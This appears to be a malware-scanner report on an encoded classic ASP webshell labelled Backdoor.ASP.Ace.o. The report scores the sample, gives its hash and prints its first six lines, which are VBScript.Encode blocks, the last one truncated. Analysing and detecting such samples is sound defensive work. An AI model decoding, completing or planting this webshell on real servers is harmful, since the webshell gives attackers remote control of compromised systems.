Hostile 92% Download

Backdoor.ASP.Ace.o

Encoded ASP webshell backdoor

Webshell in VBscript or JScript encoded using *.Encode plus a suspicious stringClassic ASP VBScript.Encode language directive
SHA-256627ccfbf496d8ced3861873be078ea30604fb5de80b102cda9656fde8fdcc264
MaleculeO(C)Th

Evidence

Classic ASP VBScript.Encode language directive lines 1–6
1<%@ LANGUAGE = VBScript.Encode %>
2<%#@~^CgAAAA==[b:~K4Ns?}fQMAAA==^#~@%>
3<%#@~^CQAAAA==[b:~6NmYlWgMAAA==^#~@%>
4<%#@~^EAAAAA==[b:~K4NZW!xDok^+HgYAAA==^#~@%>
5<%#@~^FAAAAA==G PnMDKDPM+k;:PU+XYtwcAAA==^#~@%>
6<%#@~^PgAAAA==jY~K4Ns?}P{~?D-+MR/.lY64N+mDcE?1DbwOkULcsrVjXkYnh}4Ln^DJbDhYAAA==^#~ …

Keyboard shortcuts on this page: j for the next sample, k for the previous one, x to go back to the feed, d to download the original bytes, r to re-queue the sample for analysis.